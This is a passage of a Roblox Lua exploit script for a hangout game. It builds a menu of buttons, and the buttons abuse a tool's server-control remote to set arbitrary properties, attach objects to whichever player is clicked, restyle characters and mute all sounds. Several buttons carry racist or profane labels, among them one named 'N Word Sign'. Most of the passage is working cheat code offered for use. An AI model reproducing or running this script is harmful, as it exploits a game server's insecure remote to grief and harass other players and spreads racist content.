| 927 | CE:FireEvent("Cloud",MainUserW["Cloud"]["LocalScript"],"Disabled",true)
| |
| 928 | CE:FireEvent("Cloud",MainUserW["Cloud"],"Name",Name) wait()
| |
| 929 | local Luger = MainUserW["Luger"] | |
| 930 | function ReloadLuger() | |
| 931 | local Animation = Instance.new("Animation")
| |
| 932 | -- RELOAD | |
| 933 | Animation.AnimationId = "rbxassetid://95384819" | |
| 934 | local AnimationLoader = MainUserP.Character.Humanoid:LoadAnimation(Animation) | |
| 935 | AnimationLoader:Play() | |
| 936 | AnimationLoader:AdjustSpeed(1) | |
| 937 | Ammo = Ammo + 10 | |
| 938 | end | |
| 939 | MainUserP:GetMouse().Button1Down:Connect(function() | |
| 940 | if MainUserW:FindFirstChild("Luger") then
| |
| 941 | if Ammo >= 0 then | |
| 942 | if MainUserP:GetMouse().Target.Parent:FindFirstChild("HumanoidRootPart") or MainUserP:GetMouse().Target.Parent.Parent:FindFirstChild("HumanoidRootPart") then
| |
| 943 | CE:FireEvent("Luger",Luger,"GripRight",Vector3.new(0.838, -0.026, -0.545))
| |
| 944 | local Animation = Instance.new("Animation")
| |
| 945 | -- SHOOT | |
| 946 | Animation.AnimationId = "rbxassetid://182634467" | |
| 947 | local AnimationLoader = MainUserP.Character.Humanoid:LoadAnimation(Animation) | |
| 948 | AnimationLoader:Play() AnimationLoader:AdjustSpeed(4) | |
| 949 | wait() | |
| 950 | game.ReplicatedStorage.NetworkEvent:FireServer("RPName",false, "Bullet")
| |
| 951 | wait(0.5) | |
| 952 | CE:FireEvent("Luger",MainUserW["Bullet"]:WaitForChild("Head"),"Parent",MainUserP:GetMouse().Target.Parent)
| |
| 953 | Ammo = Ammo - 1 | |
| 954 | CE:FireEvent("Luger",Luger,"GripRight",Vector3.new(1, -0.026, 0))
| |
| 955 | end | |
| 956 | elseif Ammo == 0 or Ammo <= 0 then | |
| 957 | ReloadLuger() | |
| 958 | end | |
| 959 | end | |
| 960 | end) | |
| 961 | end) | |
| 962 | DStaff.Name = "DStaff" | |
| 963 | DStaff.Parent = Page2Frame | |
| 964 | DStaff.BackgroundColor3 = Color3.new(1, 0, 0.498039) | |
| 965 | DStaff.BorderColor3 = Color3.new(1, 0, 0.498039) | |
| 966 | DStaff.Position = UDim2.new(0.040076334, 0, 0.405982912, 0) | |
| 967 | DStaff.Size = UDim2.new(0, 200, 0, 50) | |
| 968 | DStaff.Font = Enum.Font.SourceSans | |
| 969 | DStaff.Text = "Dance Staff" | |
| 970 | DStaff.TextColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 971 | DStaff.TextSize = 22 | |
| 972 | DStaff.MouseButton1Down:connect(function() | |
| 973 | local UserName = game:GetService('Players').LocalPlayer.Name
| |
| 974 | local Autoride = true | |
| 975 | local Animations = {
| |
| 976 | Shoot = 73177702, | |
| 977 | Reload = 46151856 | |
| 978 | } | |
| 979 | local Ammo = 999 | |
| 980 | local Icon, Mesh, Texture = 3898521022, 26414793, 3898465162 | |
| 981 | local Name, ToolTip = "Checkstaff", "A fucking staff are you fucking blind?" | |
| 982 | -- Cloud Express | |
| 983 | -- [!]Do not edit below[!] -- | |
| 984 | local CE = {}
| |
| 985 | local Variables = {
| |
| 986 | workspace = game:GetService("Workspace"),
| |
| 987 | players = game:GetService("Players")
| |
| 988 | } | |
| 989 | local MainUserP, MainUserW = Variables.players.LocalPlayer, Variables.workspace:FindFirstChild(UserName) | |
| 990 | function CE:FireEvent(ItemName, Object, Property, Value) | |
| 991 | MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
| |
| 992 | end | |
| 993 | MainUserP["Backpack"]:WaitForChild("Cloud").Parent = MainUserW
| |
| 994 | CE:FireEvent("Cloud",MainUserW["Cloud"],"TextureId","rbxassetid://"..Icon)
| |
| 995 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"MeshId","rbxassetid://"..Mesh)
| |
| 996 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"TextureId","rbxassetid://"..Texture)
| |
| 997 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"Scale",Vector3.new(1,1,1))
| |
| 998 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"Orientation",Vector3.new(-0,0,0))
| |
| 999 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"Position",Vector3.new(-0,0,-0))
| |
| 1000 | CE:FireEvent("Cloud",MainUserW["Cloud"],"GripForward",Vector3.new(-0, -0, -0))
| |
| 1001 | CE:FireEvent("Cloud",MainUserW["Cloud"],"GripPos",Vector3.new(0, -0.2, -0.1))
| |
| 1002 | CE:FireEvent("Cloud",MainUserW["Cloud"],"GripRight",Vector3.new(0, -0, 0))
| |
| 1003 | CE:FireEvent("Cloud",MainUserW["Cloud"],"GripUp",Vector3.new(-0.027, 10, -0.089))
| |
| 1004 | CE:FireEvent("Cloud",MainUserW["Cloud"],"ToolTip",ToolTip)
| |
| 1005 | CE:FireEvent("Cloud",MainUserW["Cloud"]["LocalScript"],"Disabled",true)
| |
| 1006 | CE:FireEvent("Cloud",MainUserW["Cloud"],"Name",Name)
| |
| 1007 | wait() | |
| 1008 | local Checkstaff = MainUserW["Checkstaff"] | |
| 1009 | function ReloadXKsStaff() | |
| 1010 | local Animation = Instance.new("Animation")
| |
| 1011 | -- RELOAD | |
| 1012 | Animation.AnimationId = "rbxassetid://46151856" | |
| 1013 | local AnimationLoader = MainUserP.Character.Humanoid:LoadAnimation(Animation) | |
| 1014 | AnimationLoader:Play() AnimationLoader:AdjustSpeed(1) | |
| 1015 | Ammo = Ammo + 9999999999999999999 | |
| 1016 | end | |
| 1017 | MainUserP:GetMouse().Button1Down:Connect(function() | |
| 1018 | if MainUserW:FindFirstChild("Checkstaff") then
| |
| 1019 | if Ammo >= 0 then | |
| 1020 | if MainUserP:GetMouse().Target.Parent:FindFirstChild("HumanoidRootPart") or MainUserP:GetMouse().Target.Parent.Parent:FindFirstChild("HumanoidRootPart") then
| |
| 1021 | CE:FireEvent("Checkstaff",Checkstaff,"GripRight",Vector3.new(0.838, -0.026, -0.545))
| |
| 1022 | local Animation = Instance.new("Animation")
| |
| 1023 | -- SHOOT | |
| 1024 | Animation.AnimationId = "rbxassetid://73177702" | |
| 1025 | local AnimationLoader = MainUserP.Character.Humanoid:LoadAnimation(Animation) | |
| 1026 | AnimationLoader:Play() | |
| 1027 | AnimationLoader:AdjustSpeed(2) | |
| 1028 | wait() | |
| 1029 | game.ReplicatedStorage.NetworkEvent:FireServer("RPName",false, ".")
| |
| 1030 | wait(0.5) | |
| 1031 | CE:FireEvent("Checkstaff",MainUserW["."]:WaitForChild("Head"),"Parent",MainUserP:GetMouse().Target.Parent)
| |
| 1032 | Ammo = Ammo - 1 | |
| 1033 | CE:FireEvent("Checkstaff",Checkstaff,"GripRight",Vector3.new(1, -0.026, 0))
| |
| 1034 | AnimationLoader:Stop() | |
| 1035 | end | |
| 1036 | elseif Ammo == 0 or Ammo <= 0 then | |
| 1037 | ReloadCheckstaff() | |
| 1038 | end | |
| 1039 | end | |
| 1040 | end) | |
| 1041 | end) | |
| 1042 | DanceDemon.Name = "Dance Demon" | |
| 1043 | DanceDemon.Parent = Page2Frame | |
| 1044 | DanceDemon.BackgroundColor3 = Color3.new(1, 0, 0.498039) | |
| 1045 | DanceDemon.BorderColor3 = Color3.new(1, 0, 0.498039) | |
| 1046 | DanceDemon.Position = UDim2.new(0.574427485, 0, 0.405982912, 0) | |
| 1047 | DanceDemon.Size = UDim2.new(0, 200, 0, 50) | |
| 1048 | DanceDemon.Font = Enum.Font.SourceSans | |
| 1049 | DanceDemon.Text = "Dance Demon" | |
| 1050 | DanceDemon.TextColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 1051 | DanceDemon.TextSize = 22 | |
| 1052 | DanceDemon.MouseButton1Down:connect(function() | |
| 1053 | local UserName = game:GetService('Players').LocalPlayer.Name
| |
| 1054 | local Autoride = true | |
| 1055 | local Ammo = 100000000000000 | |
| 1056 | local Name, ToolTip = "Luger", "a ooga booga staff" | |
| 1057 | local CE = {}
| |
| 1058 | local Variables = {
| |
| 1059 | workspace = game:GetService("Workspace"),
| |
| 1060 | players = game:GetService("Players")
| |
| 1061 | } | |
| 1062 | local MainUserP, MainUserW = Variables.players.LocalPlayer, Variables.workspace:FindFirstChild(UserName) | |
| 1063 | function CE:FireEvent(ItemName, Object, Property, Value) | |
| 1064 | MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
| |
| 1065 | end | |
| 1066 | MainUserP["Backpack"]:WaitForChild("Cloud").Parent = MainUserW CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"], "MeshId", "rbxassetid://")
| |
| 1067 | CE:FireEvent("Cloud",MainUserW["Head"]["face"], "Transparency", 0) CE:FireEvent("Cloud",MainUserW["Shirt"], "ShirtTemplate", "rbxassetid://4265534730")
| |
| 1068 | CE:FireEvent("Cloud",MainUserW["Head"]["face"], "Texture", "rbxassetid://3476553829")
| |
| 1069 | CE:FireEvent("Cloud",MainUserW["Pants"], "PantsTemplate", "rbxassetid://4265569647")
| |
| 1070 | CE:FireEvent("Cloud",MainUserW["Robloxclassicred"]["Handle"]["Mesh"], "MeshId", "rbxassetid://13640868")
| |
| 1071 | CE:FireEvent("Cloud",MainUserW["Robloxclassicred"]["Handle"]["Mesh"], "TextureId", "rbxassetid://13640869")
| |
| 1072 | CE:FireEvent("Cloud",MainUserW["Robloxclassicred"]["Handle"]["HatAttachment"], "Position", Vector3.new(0, -0.2, 0))
| |
| 1073 | CE:FireEvent("Cloud",MainUserW["Head"], "Color", Color3.fromRGB(17, 17, 17))
| |
| 1074 | CE:FireEvent("Cloud",MainUserW["Torso"], "Color", Color3.fromRGB(17, 17, 17))
| |
| 1075 | CE:FireEvent("Cloud",MainUserW["Left Arm"], "Color", Color3.fromRGB(17, 17, 17))
| |
| 1076 | CE:FireEvent("Cloud",MainUserW["Right Arm"], "Color", Color3.fromRGB(17, 17, 17))
| |
| 1077 | CE:FireEvent("Cloud",MainUserW["Left Leg"], "Color", Color3.fromRGB(17, 17, 17))
| |
| 1078 | CE:FireEvent("Cloud",MainUserW["Right Leg"], "Color", Color3.fromRGB(17, 17, 17))
| |
| 1079 | CE:FireEvent("Cloud",MainUserW["Cloud"],"GripForward",Vector3.new(-0.545, -0.089, -0.834))
| |
| 1080 | CE:FireEvent("Cloud",MainUserW["Cloud"],"GripPos",Vector3.new(0, 0, 1.7))
| |
| 1081 | CE:FireEvent("Cloud",MainUserW["Cloud"],"GripRight",Vector3.new(5, -1, 0))
| |
| 1082 | CE:FireEvent("Cloud",MainUserW["Cloud"],"GripUp",Vector3.new(1, 0, -6))
| |
| 1083 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"MeshId","rbxassetid://38164532")
| |
| 1084 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"TextureId","rbxassetid://969083290")
| |
| 1085 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"Scale",Vector3.new(1, 1, 0.-1.0))
| |
| 1086 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"Orientation",Vector3.new(0, 0, 0))
| |
| 1087 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"Position",Vector3.new(0, 0, 0))
| |
| 1088 | CE:FireEvent("Cloud",MainUserW["Cloud"],"ToolTip",ToolTip)
| |
| 1089 | CE:FireEvent("Cloud",MainUserW["Cloud"]["LocalScript"],"Disabled",true)
| |
| 1090 | CE:FireEvent("Cloud",MainUserW["Cloud"],"Name",Name) wait()
| |
| 1091 | local Luger = MainUserW["Luger"] | |
| 1092 | function ReloadLuger() | |
| 1093 | local Animation = Instance.new("Animation")
| |
| 1094 | -- RELOAD | |
| 1095 | Animation.AnimationId = "rbxassetid://95384819" | |
| 1096 | local AnimationLoader = MainUserP.Character.Humanoid:LoadAnimation(Animation) | |
| 1097 | AnimationLoader:Play() | |
| 1098 | AnimationLoader:AdjustSpeed(1) | |
| 1099 | Ammo = Ammo + 10 | |
| 1100 | end | |
| 1101 | MainUserP:GetMouse().Button1Down:Connect(function() | |
| 1102 | if MainUserW:FindFirstChild("Luger") then
| |
| 1103 | if Ammo >= 0 then | |
| 1104 | if MainUserP:GetMouse().Target.Parent:FindFirstChild("HumanoidRootPart") or MainUserP:GetMouse().Target.Parent.Parent:FindFirstChild("HumanoidRootPart") then
| |
| 1105 | CE:FireEvent("Luger",Luger,"GripRight",Vector3.new(1, -0.026, 0))
| |
| 1106 | local Animation = Instance.new("Animation") wait(0.1)
| |
| 1107 | -- SHOOT | |
| 1108 | Animation.AnimationId = "rbxassetid://243827693" | |
| 1109 | local AnimationLoader = MainUserP.Character.Humanoid:LoadAnimation(Animation) | |
| 1110 | AnimationLoader:Play() AnimationLoader:AdjustSpeed(1) | |
| 1111 | wait() | |
| 1112 | game.ReplicatedStorage.NetworkEvent:FireServer("RPName",false, "Trxsh")
| |
| 1113 | wait(0.5) | |
| 1114 | CE:FireEvent("Luger",MainUserW["Trxsh"]:WaitForChild("Head"),"Parent",MainUserP:GetMouse().Target.Parent)
| |
| 1115 | Ammo = Ammo - 1 | |
| 1116 | CE:FireEvent("Luger",MainUserW["Cloud"]["Handle"]["Wind"],"SoundId","rbxassetid://10722059")
| |
| 1117 | CE:FireEvent("Luger",MainUserW["Cloud"],"GripRight",Vector3.new(1, -0.026, 0))
| |
| 1118 | CE:FireEvent("Luger",MainUserW["Cloud"],"GripPos",Vector3.new(0.294, -0.606, 0.46))
| |
| 1119 | end | |
| 1120 | elseif Ammo == 0 or Ammo <= 0 then | |
| 1121 | ReloadLuger() | |
| 1122 | end | |
| 1123 | end | |
| 1124 | end) | |
| 1125 | end) | |
| 1126 | NSign.Name = "NSign" | |
| 1127 | NSign.Parent = Page2Frame | |
| 1128 | NSign.BackgroundColor3 = Color3.new(1, 0, 0.498039) | |
| 1129 | NSign.BorderColor3 = Color3.new(1, 0, 0.498039) | |
| 1130 | NSign.Position = UDim2.new(0.040076334, 0, 0.743589818, 0) | |
| 1131 | NSign.Size = UDim2.new(0, 200, 0, 50) | |
| 1132 | NSign.Font = Enum.Font.SourceSans | |
| 1133 | NSign.Text = "N Word Sign" | |
| 1134 | NSign.TextColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 1135 | NSign.TextSize = 22 | |
| 1136 | NSign.MouseButton1Down:connect(function() | |
| 1137 | local UserName = game:GetService('Players').LocalPlayer.Name
| |
| 1138 | local Autoride = true | |
| 1139 | local Animations = {
| |
| 1140 | Shoot = 95383980, | |
| 1141 | Reload = 95384819 | |
| 1142 | } | |
| 1143 | local Ammo = 1000 | |
| 1144 | local Icon, Mesh, Texture = 95356596, 4117568343, 460844143 | |
| 1145 | local Name, ToolTip = "Luger", "Fire In The Hole!!" | |
| 1146 | -- Cloud Express | |
| 1147 | -- [!]Do not edit below[!] -- | |
| 1148 | local CE = {}
| |
| 1149 | local Variables = {
| |
| 1150 | workspace = game:GetService("Workspace"),
| |
| 1151 | players = game:GetService("Players")
| |
| 1152 | } | |
| 1153 | local MainUserP, MainUserW = Variables.players.LocalPlayer, Variables.workspace:FindFirstChild(UserName) | |
| 1154 | function CE:FireEvent(ItemName, Object, Property, Value) | |
| 1155 | MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
| |
| 1156 | end | |
| 1157 | MainUserP["Backpack"]:WaitForChild("Cloud").Parent = MainUserW CE:FireEvent("Cloud",MainUserW["Cloud"],"TextureId","rbxassetid://"..Icon)
| |
| 1158 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"MeshId","rbxassetid://"..Mesh)
| |
| 1159 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"TextureId","rbxassetid://"..Texture)
| |
| 1160 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"Scale",Vector3.new(22,22,22))
| |
| 1161 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"Orientation",Vector3.new(-0.23,12.94,1.05))
| |
| 1162 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"Position",Vector3.new(-111.387,3.568,-35.084))
| |
| 1163 | CE:FireEvent("Cloud",MainUserW["Cloud"],"GripForward",Vector3.new(-0.545, -0.089, -0.834))
| |
| 1164 | CE:FireEvent("Cloud",MainUserW["Cloud"],"GripPos",Vector3.new(0.094, -0.206, 0.56))
| |
| 1165 | CE:FireEvent("Cloud",MainUserW["Cloud"],"GripRight",Vector3.new(1, -0.026, 0))
| |
| 1166 | CE:FireEvent("Cloud",MainUserW["Cloud"],"GripUp",Vector3.new(-0.027, 0.996, -0.089))
| |
| 1167 | CE:FireEvent("Cloud",MainUserW["Cloud"],"ToolTip",ToolTip)
| |
| 1168 | CE:FireEvent("Cloud",MainUserW["Cloud"]["LocalScript"],"Disabled",true)
| |
| 1169 | CE:FireEvent("Cloud",MainUserW["Cloud"],"Name",Name)
| |
| 1170 | wait() | |
| 1171 | local Luger = MainUserW["Luger"] | |
| 1172 | function ReloadLuger() | |
| 1173 | local Animation = Instance.new("Animation")
| |
| 1174 | -- RELOAD | |
| 1175 | Animation.AnimationId = "rbxassetid://95384819" | |
| 1176 | local AnimationLoader = MainUserP.Character.Humanoid:LoadAnimation(Animation) | |
| 1177 | AnimationLoader:Play() | |
| 1178 | AnimationLoader:AdjustSpeed(1) | |
| 1179 | Ammo = Ammo + 10 | |
| 1180 | end | |
| 1181 | MainUserP:GetMouse().Button1Down:Connect(function() | |
| 1182 | if MainUserW:FindFirstChild("Luger") then
| |
| 1183 | if Ammo >= 0 then | |
| 1184 | if MainUserP:GetMouse().Target.Parent:FindFirstChild("HumanoidRootPart") or MainUserP:GetMouse().Target.Parent.Parent:FindFirstChild("HumanoidRootPart") then
| |
| 1185 | CE:FireEvent("Luger",Luger,"GripRight",Vector3.new(0.838, -0.026, -0.545))
| |
| 1186 | local Animation = Instance.new("Animation")
| |
| 1187 | -- SHOOT | |
| 1188 | Animation.AnimationId = "rbxassetid://460994257" | |
| 1189 | local AnimationLoader = MainUserP.Character.Humanoid:LoadAnimation(Animation) | |
| 1190 | AnimationLoader:Play() | |
| 1191 | AnimationLoader:AdjustSpeed(4) | |
| 1192 | wait() | |
| 1193 | game.ReplicatedStorage.NetworkEvent:FireServer("RPName",false, "Black power")
| |
| 1194 | wait(0.5) CE:FireEvent("Luger",MainUserW["Black power"]:WaitForChild("Head"),"Parent",MainUserP:GetMouse().Target.Parent)
| |
| 1195 | Ammo = Ammo - 1 | |
| 1196 | CE:FireEvent("Luger",Luger,"GripRight",Vector3.new(1, -0.026, 0))
| |
| 1197 | end | |
| 1198 | elseif Ammo == 0 or Ammo <= 0 then | |
| 1199 | ReloadLuger() | |
| 1200 | end | |
| 1201 | end | |
| 1202 | end) | |
| 1203 | --[[ | |
| 1204 | luger script | |
| 1205 | https://www.roblox.com/games/268066633/Boys-And-Girls-Hangout | |
| 1206 | ]]-- | |
| 1207 | end) | |
| 1208 | MadeBy_2.Name = "MadeBy" | |
| 1209 | MadeBy_2.Parent = Page2Frame | |
| 1210 | MadeBy_2.BackgroundColor3 = Color3.new(1, 1, 1) | |
| 1211 | MadeBy_2.BackgroundTransparency = 1 | |
| 1212 | MadeBy_2.Position = UDim2.new(-1.21071935e-08, 0, -0.0854702592, 0) | |
| 1213 | MadeBy_2.Size = UDim2.new(0, 200, 0, 11) | |
| 1214 | MadeBy_2.Font = Enum.Font.SourceSans | |
| 1215 | MadeBy_2.Text = "purrfferfish eat carrut" | |
| 1216 | MadeBy_2.TextColor3 = Color3.new(1, 1, 1) | |
| 1217 | MadeBy_2.TextSize = 14 | |
| 1218 | ComingSoon_2.Name = "Coming Soon..." | |
| 1219 | ComingSoon_2.Parent = Page2Frame | |
| 1220 | ComingSoon_2.BackgroundColor3 = Color3.new(1, 0, 0.498039) | |
| 1221 | ComingSoon_2.BorderColor3 = Color3.new(1, 0, 0.498039) | |
| 1222 | ComingSoon_2.Position = UDim2.new(0.570614278, 0, 0.743589699, 0) | |
| 1223 | ComingSoon_2.Size = UDim2.new(0, 200, 0, 50) | |
| 1224 | ComingSoon_2.Font = Enum.Font.SourceSans | |
| 1225 | ComingSoon_2.Text = "Coming Soon..." | |
| 1226 | ComingSoon_2.TextColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 1227 | ComingSoon_2.TextSize = 22 | |
| 1228 | Page3Frame.Name = "Page3Frame" | |
| 1229 | Page3Frame.Parent = HomeFrame | |
| 1230 | Page3Frame.BackgroundColor3 = Color3.new(0.176471, 0.176471, 0.176471) | |
| 1231 | Page3Frame.BorderColor3 = Color3.new(0.176471, 0.176471, 0.176471) | |
| 1232 | Page3Frame.Position = UDim2.new(0, 0, 0.112999998, 0) | |
| 1233 | Page3Frame.Size = UDim2.new(0, 525, 0, 234) | |
| 1234 | Page3Frame.Visible = false EGirl.Name = "EGirl" | |
| 1235 | EGirl.Parent = Page3Frame | |
| 1236 | EGirl.BackgroundColor3 = Color3.new(1, 0, 0.498039) | |
| 1237 | EGirl.BorderColor3 = Color3.new(1, 0, 0.498039) | |
| 1238 | EGirl.Position = UDim2.new(0.040076334, 0, 0.0470085479, 0) | |
| 1239 | EGirl.Size = UDim2.new(0, 200, 0, 50) | |
| 1240 | EGirl.Font = Enum.Font.SourceSans | |
| 1241 | EGirl.Text = "E-Girl" | |
| 1242 | EGirl.TextColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 1243 | EGirl.TextSize = 22 | |
| 1244 | EGirl.MouseButton1Down:connect(function() | |
| 1245 | local UserName = game:GetService('Players').LocalPlayer.Name
| |
| 1246 | local Autoride = true | |
| 1247 | local Ammo = 100000000000000 | |
| 1248 | local Name, ToolTip = "Luger", "no anime AK" | |
| 1249 | local CE = {}
| |
| 1250 | local Variables = {
| |
| 1251 | workspace = game:GetService("Workspace"),
| |
| 1252 | players = game:GetService("Players")
| |
| 1253 | } | |
| 1254 | local MainUserP, MainUserW = Variables.players.LocalPlayer, Variables.workspace:FindFirstChild(UserName) | |
| 1255 | function CE:FireEvent(ItemName, Object, Property, Value) | |
| 1256 | MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
| |
| 1257 | end | |
| 1258 | MainUserP["Backpack"]:WaitForChild("Cloud").Parent = MainUserW
| |
| 1259 | CE:FireEvent("Cloud",MainUserW["Cloud"], "TextureId", "rbxassetid://172750515")
| |
| 1260 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"], "MeshId", "rbxassetid://")
| |
| 1261 | CE:FireEvent("Cloud",MainUserW["Head"]["face"], "Transparency", 0)
| |
| 1262 | CE:FireEvent("Cloud",MainUserW["Shirt"], "ShirtTemplate", "rbxassetid://4265534730")
| |
| 1263 | CE:FireEvent("Cloud",MainUserW["Head"]["face"], "Texture", "rbxassetid://1080819199")
| |
| 1264 | CE:FireEvent("Cloud",MainUserW["Pants"], "PantsTemplate", "rbxassetid://3388476074")
| |
| 1265 | CE:FireEvent("Cloud",MainUserW["Robloxclassicred"]["Handle"]["Mesh"], "MeshId", "rbxassetid://4095219325")
| |
| 1266 | CE:FireEvent("Cloud",MainUserW["Robloxclassicred"]["Handle"]["Mesh"], "TextureId", "rbxassetid://4095396970")
| |
| 1267 | CE:FireEvent("Cloud",MainUserW["Robloxclassicred"]["Handle"]["HatAttachment"], "Position", Vector3.new(0, 0.45, 0))
| |
| 1268 | CE:FireEvent("Cloud",MainUserW["RobloxVisor2019"]["Handle"]["Mesh"], "MeshId", "rbxassetid://3036575411")
| |
| 1269 | CE:FireEvent("Cloud",MainUserW["RobloxVisor2019"]["Handle"]["Mesh"], "TextureId", "rbxassetid://3065597591")
| |
| 1270 | CE:FireEvent("Cloud",MainUserW["RobloxVisor2019"]["Handle"]["HatAttachment"], "Position", Vector3.new(0, 0.7, -0.35))
| |
| 1271 | CE:FireEvent("Cloud",MainUserW["Ultra-Fabulous Hair"]["Handle"]["Mesh"], "MeshId", "rbxassetid://192462203")
| |
| 1272 | CE:FireEvent("Cloud",MainUserW["Ultra-Fabulous Hair"]["Handle"]["Mesh"], "TextureId", "rbxassetid://192462176")
| |
| 1273 | CE:FireEvent("Cloud",MainUserW["Ultra-Fabulous Hair"]["Handle"]["HairAttachment"], "Position", Vector3.new(0, 2, -0.62))
| |
| 1274 | CE:FireEvent("Cloud",MainUserW["Head"], "Color", Color3.fromRGB(204, 142, 105))
| |
| 1275 | CE:FireEvent("Cloud",MainUserW["Torso"], "Color", Color3.fromRGB(204, 142, 105))
| |
| 1276 | CE:FireEvent("Cloud",MainUserW["Left Arm"], "Color", Color3.fromRGB(204, 142, 105))
| |
| 1277 | CE:FireEvent("Cloud",MainUserW["Right Arm"], "Color", Color3.fromRGB(204, 142, 105))
| |
| 1278 | CE:FireEvent("Cloud",MainUserW["Left Leg"], "Color", Color3.fromRGB(204, 142, 105))
| |
| 1279 | CE:FireEvent("Cloud",MainUserW["Right Leg"], "Color", Color3.fromRGB(204, 142, 105))
| |
| 1280 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"MeshId","rbxassetid://3824749")
| |
| 1281 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"TextureId","rbxassetid://2130670615")
| |
| 1282 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"Scale",Vector3.new(1.7, 1.3, 1.4))
| |
| 1283 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"Orientation",Vector3.new(0, 0, 0))
| |
| 1284 | CE:FireEvent("Cloud",MainUserW["Cloud"]["Handle"]["Mesh"],"Position",Vector3.new(0, 0, 0))
| |
| 1285 | CE:FireEvent("Cloud",MainUserW["Cloud"],"ToolTip",ToolTip)
| |
| 1286 | CE:FireEvent("Cloud",MainUserW["Cloud"]["LocalScript"],"Disabled",true)
| |
| 1287 | CE:FireEvent("Cloud",MainUserW["Cloud"],"Name",Name)
| |
| 1288 | wait() | |
| 1289 | local Luger = MainUserW["Luger"] | |
| 1290 | function ReloadLuger() | |
| 1291 | local Animation = Instance.new("Animation")
| |
| 1292 | -- RELOAD | |
| 1293 | Animation.AnimationId = "rbxassetid://95384819" | |
| 1294 | local AnimationLoader = MainUserP.Character.Humanoid:LoadAnimation(Animation) | |
| 1295 | AnimationLoader:Play() | |
| 1296 | AnimationLoader:AdjustSpeed(1) | |
| 1297 | Ammo = Ammo + 10 | |
| 1298 | end | |
| 1299 | MainUserP:GetMouse().Button1Down:Connect(function() | |
| 1300 | if MainUserW:FindFirstChild("Luger") then
| |
| 1301 | if Ammo >= 0 then | |
| 1302 | if MainUserP:GetMouse().Target.Parent:FindFirstChild("HumanoidRootPart") or MainUserP:GetMouse().Target.Parent.Parent:FindFirstChild("HumanoidRootPart") then
| |
| 1303 | CE:FireEvent("Luger",Luger,"GripRight",Vector3.new(1, -0.026, 0))
| |
| 1304 | local Animation = Instance.new("Animation") wait(0.1)
| |
| 1305 | -- SHOOT | |
| 1306 | Animation.AnimationId = "rbxassetid://89456847" | |
| 1307 | local AnimationLoader = MainUserP.Character.Humanoid:LoadAnimation(Animation) | |
| 1308 | AnimationLoader:Play() | |
| 1309 | AnimationLoader:AdjustSpeed(1) | |
| 1310 | wait() | |
| 1311 | game.ReplicatedStorage.NetworkEvent:FireServer("RPName",false, "sksksk")
| |
| 1312 | wait(0.5) CE:FireEvent("Luger",MainUserW["sksksk"]:WaitForChild("Head"),"Parent",MainUserP:GetMouse().Target.Parent)
| |
| 1313 | Ammo = Ammo - 1 | |
| 1314 | CE:FireEvent("Luger",MainUserW["Cloud"]["Handle"]["Wind"],"SoundId","rbxassetid://10722059")
| |
| 1315 | CE:FireEvent("Luger",MainUserW["Cloud"],"GripRight",Vector3.new(1, -0.026, 0))
| |
| 1316 | CE:FireEvent("Luger",MainUserW["Cloud"],"GripPos",Vector3.new(0.294, -0.606, 0.46))
| |
| 1317 | end | |
| 1318 | elseif Ammo == 0 or Ammo <= 0 then | |
| 1319 | ReloadLuger() | |
| 1320 | end | |
| 1321 | end | |
| 1322 | end) | |
| 1323 | end) | |
| 1324 | MuteRadios.Name = "Mute Radios" | |
| 1325 | MuteRadios.Parent = Page3Frame | |
| 1326 | MuteRadios.BackgroundColor3 = Color3.new(1, 0, 0.498039) | |
| 1327 | MuteRadios.BorderColor3 = Color3.new(1, 0, 0.498039) | |
| 1328 | MuteRadios.Position = UDim2.new(0.574427485, 0, 0.0470085479, 0) | |
| 1329 | MuteRadios.Size = UDim2.new(0, 200, 0, 50) | |
| 1330 | MuteRadios.Font = Enum.Font.SourceSans | |
| 1331 | MuteRadios.Text = "Mute Radios" | |
| 1332 | MuteRadios.TextColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 1333 | MuteRadios.TextSize = 22 | |
| 1334 | MuteRadios.MouseButton1Down:connect(function() | |
| 1335 | for i,v in next,workspace:GetDescendants() do | |
| 1336 | if v:IsA("Sound") then
| |
| 1337 | v.Playing = false | |
| 1338 | end | |
| 1339 | end | |
| 1340 | end) | |
| 1341 | LoudBoom.Name = "LoudBoom" | |
